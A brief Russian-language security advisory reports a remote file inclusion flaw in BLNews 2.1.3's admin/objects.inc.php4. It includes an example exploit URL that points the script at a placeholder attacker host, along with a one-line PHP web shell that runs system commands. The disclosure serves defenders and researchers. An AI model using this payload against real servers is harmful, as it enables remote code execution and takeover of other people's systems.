Уязвимость включения файлов обнаружена в BLNews. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы, на целевом сервере.
DWC Gr0up сообщает, что сценарий admin/objects.inc.php4 использует переменную $Server[path], но не определяет эту переменную. Удаленный пользователь может представить значение для этой переменной, ссылающееся на сценарий, расположенный на удаленном сервере, который будет выполнен на целевом сервере. Пример:
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4
with
<? system($cmd) ?>
Уязвимость обнаружена в BLNews 2.1.3.
